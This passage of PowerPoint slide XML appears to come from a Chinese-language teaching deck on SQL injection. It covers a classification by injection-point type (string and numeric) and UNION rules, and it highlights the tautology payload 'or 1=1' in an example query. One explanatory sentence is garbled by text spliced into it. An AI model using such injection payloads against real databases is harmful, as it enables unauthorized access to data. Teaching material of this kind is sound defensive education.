            <a:ext cx="10757452" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select username from users where  id= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303228964"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>03.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4970991" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3300350381"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438429" y="407896"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021625" y="701566"/>
            <a:ext cx="1936180" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92FC9BA2-E37F-4883-8057-4B5BFB0AF8E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295372" y="2983386"/>
            <a:ext cx="4753975" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>按照注入点的类型分  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9081D55-3105-49BD-B2AF-C6BB91FC5107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717594" y="2069294"/>
            <a:ext cx="1602774" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>字符型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3BFD13-C595-4410-89D6-C7903B476BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717594" y="2888986"/>
            <a:ext cx="1602774" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>数字型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C298-AAB5-49A6-A836-C847902762F9}"/>
              </a:ext>
            </a:extLst>
